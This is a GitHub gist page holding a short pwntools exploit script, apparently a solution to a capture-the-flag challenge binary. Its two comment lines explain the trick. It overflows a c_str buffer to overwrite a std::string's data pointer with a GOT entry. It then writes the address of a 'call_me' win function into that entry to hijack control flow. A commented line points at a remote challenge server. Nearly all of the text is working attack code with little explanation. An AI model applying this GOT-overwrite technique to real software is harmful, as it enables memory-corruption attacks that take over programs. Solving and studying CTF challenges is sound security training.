-
-
Save c0nrad/6a901c4268bb0fa05a438b732bf433f1 to your computer and use it in GitHub Desktop.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # In memory, there's the c_str then the str. The first 8 bytes of the str is a pointer to its contents. | |
| # Overwrite that pointer with a GOT entry, and then write to the str with the win function. | |
| import pwn | |
| elf = pwn.ELF("./chall") | |
| pwn.context.binary = elf | |
| pwn.context.log_level = "DEBUG" | |
| def sla(x : bytes | str, y : bytes | str): p.sendlineafter(x, y) | |
| def p64(x : int) -> bytes: return pwn.p64(x) | |
| p = elf.process() | |
| # p = pwn.remote("34.170.146.252", "26380") | |
| sla("choice: ", "3") | |
| sla("str: ", "B"*0x1f) | |
| sla("choice: ", "1") | |
| sla("c_str: ", pwn.flat({0x20: elf.got["_ZStlsISt11char_traitsIcEERSt13basic_ostreamIcT_ES5_PKc"]})) | |
| sla("choice: ", "3") | |
| sla("str: ", pwn.p64(elf.symbols["_ZN4Test7call_meEv"])) | |
| p.interactive() |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment